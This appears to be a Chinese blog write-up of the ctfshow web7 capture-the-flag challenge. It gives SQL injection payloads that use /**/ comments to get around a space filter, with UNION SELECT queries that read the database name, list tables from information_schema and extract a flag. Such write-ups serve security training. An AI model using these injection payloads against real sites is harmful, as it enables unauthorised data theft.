首页 > 数据库 >ctfshow--web7 sql注入空格过滤

ctfshow--web7 sql注入空格过滤

时间:2024-04-03 23:55:57浏览次数:22  
标签:23 -- union flag web7 table select ctfshow

?id=10//union//select//1,database(),3//%23查看库名
image
查看表名
-1/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),3/**/%23
image
查看flag表下的flag字段
-1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3/**/%23
image

标签:23,--,union,flag,web7,table,select,ctfshow
From: https://www.cnblogs.com/wssw/p/18113735

相关文章

  • dubbo 统一异常处理
    依赖包pom.xml如下:<dependency><groupId>org.apache.dubbo</groupId><artifactId>dubbo-registry-nacos</artifactId><version>3.0.4</version></dependency>dubbo服务:示例:@DubboService(interfaceClass=......
  • 计算几何进阶
    二维凸包模板题(luogu.P2742)凸包定义给定二维平面上的点集\(P\),定义能包含这些点的最小凸多边形为\(P\)的凸包。形象地说,凸包就是一根橡皮筋拉伸,使其包括了点集\(P\)中所有点,然后使橡皮筋收紧,橡皮筋就是\(P\)的凸包。例如,下面用红色线段表示了一个点集的凸包(原创图):凸......
  • 30 天精通 RxJS (08):简易拖拉实作 - take, first, takeUntil, concatAll
    我们今天要接着讲take,first,takeUntil,concatAll这四个operators,并且实作一个简易的拖拉功能。Operatorstaketake是一个很简单的operator,顾名思义就是取前几个元素后就结束,范例如下varsource=Rx.Observable.interval(1000)varexample=source.take(3)example.......
  • OSPF & Virtual Link
    syssysnR1intg0/0/0ipadd172.0.10.124ospf1router-id255.255.255.255area0net172.0.10.00.0.0.255syssysnR2intg0/0/0ipadd172.0.10.224intg0/0/1ipadd172.0.20.124ospf1router-id2.2.2.2area0network172.0.10.00.0.0.255area1......
  • (5)让led灯以不同频率闪烁
    设计思路: 设计一共有两个模块,led_run8是一个基本灯闪烁的功能模块,而本项目的实现在led_run8_test模块。通过参数化调用,让led_run8的led去驱动led_run8_test模块模块中每一位的led。那么怎么实现不同频率闪烁呢?用defparam语句使得每一个例化平台中的MCNT(即最......
  • mysql操作
    mysql启动(停止):1、开始-右击-管理-服务和应用程序-服务-mysql名-右击-启动(停止)2、开始-命令提示符-右击-以管理员身份-netstart(stop)mysql名mysql服务端的登录和退出进入:1、开始-mysql-mysqlserver-mysqlCommandLineClient-输入root密码(不建议,只适用于root用户)2、通过Win......
  • Java访问修饰符
    四种访问修饰符范围访问级别访问控制修饰符同类同包子类不同包公开 public允许允许允许允许受保护protected允许允许允许不允许默认 没有修饰符允许允许不允许不允许私有private允许不允许不允许不允许注意事项修饰符可以用来修......
  • SpringMVC学习笔记
    1、概述基于java实现的实现mvc模型的轻量级web框架SpringMVC是一种表现层的框架技术,用于web层的功能开发,是对Servlet进行的封装主要的作用是接收请求和数据,响应结果,所以如何处理请求和响应是SpringMVC的重点​ 之前的开发将后端服务器Servlet拆分成三层,分别是web、service......
  • 多态
    多态:方法或对象具有多种形态,oop的第三大特征,建立在封装继承基础之上的多态具体体现。方法多态多态具体体现:重载体现 重写体现对象多态对象的编译类型和运行类型可以不一致,编译类型在定义时就已经确定,不能改变,对象的运行类型可以改变,可通过getClass查看,编译类型看定义时,及'......
  • 单例设计模式
    概念静态方法和属性的使用设计模式是在大量的实践中总结和理论化之后优选的代码结构、编程风格、以及解决问题的思考方式。类的单例模式就是采取一定的方法保证在整个软件系统中,对某个类只能存在一个对象实例,且该类只能提供一个取得对象实例的方法。单例模式两种方式饿汉式......